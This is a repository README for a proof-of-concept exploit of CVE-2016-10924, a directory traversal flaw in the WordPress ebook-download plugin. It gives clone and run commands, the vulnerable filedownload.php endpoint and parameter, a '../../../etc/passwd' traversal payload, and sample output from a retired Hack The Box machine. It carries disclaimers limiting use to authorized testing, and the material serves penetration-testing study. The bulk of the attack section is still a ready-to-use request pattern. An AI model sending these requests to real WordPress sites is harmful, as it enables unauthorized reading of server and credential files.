Proof-of-Concept (PoC) exploit script for the Directory Traversal vulnerability (CVE-2016-10924) found in the WordPress plugin ebook-download (versions < 1.2). This vulnerability allows unauthorized file reads via a crafted GET request. # CVE-2016-10924-POC
This repository contains a Proof-of-Concept (PoC) exploit script for the **Directory Traversal** vulnerability (CVE-2016-10924) found in the WordPress plugin **ebook-download** (versions < 1.2).
This vulnerability allows unauthorized file reads via a crafted GET request. The exploit leverages a parameter called `ebookdownloadurl` to traverse directories on the target server.
## Description
- **CVE-ID:** [CVE-2016-10924](https://nvd.nist.gov/vuln/detail/CVE-2016-10924)
- **Vulnerability Type:** Directory Traversal
- **Affected Component:** `ebook-download` plugin < 1.2 for WordPress
- **Impact:** Remote attackers can read arbitrary files on the underlying operating system, such as `/etc/passwd`, by manipulating the file path in the `ebookdownloadurl` parameter.
> **Note:** This PoC is for **educational and authorized testing** purposes only. Misuse of this information can lead to legal consequences.
## Requirements
- Python 3.
- `requests` library (install via `pip install requests`)
## Usage
1. **Clone the repository**:
```bash
git clone https://github.com/your-user/CVE-2016-10924-POC.git
cd CVE-2016-10924-POC
```
2. **Install Dependencies**:
```bash
pip install requests
```
3. **Run the Exploit**:
```bash
python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
```
4. **Specify the file path to read**:
After launching the script, you will be prompted for a file path. For example:
```bash
../../../../../../../../../etc/passwd
```
You may need to adjust the number of `../` based on the webroot location in the target environment.
5. **Exit**:
- Type `exit`, `quit`, or press **Enter** on an empty prompt to exit.
- Press **Ctrl + C** to stop the script immediately.
### Example
I used this exploit on "Backdoor", a retired Hack The Box machine:
```bash
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.
Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...
```
## Disclaimer
This project is intended solely for **educational** and **legitimate security testing** purposes.
**Do not** use the information or scripts within this repository on any system you do not have explicit permission to test.
Author and contributors are **not** responsible for any misuse or damage caused by this tool.
## License
This project is licensed under the [GNU 2.0 License](LICENSE). Feel free to use and modify it, but please give credit.
---
**References**
- [NVD - CVE-2016-10924](https://nvd.nist.gov/vuln/detail/CVE-2016-10924)
- [WordPress Plugin ebook-download](https://wordpress.org/plugins/ebook-download/#developers) *(for vulnerable versions reference)*
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view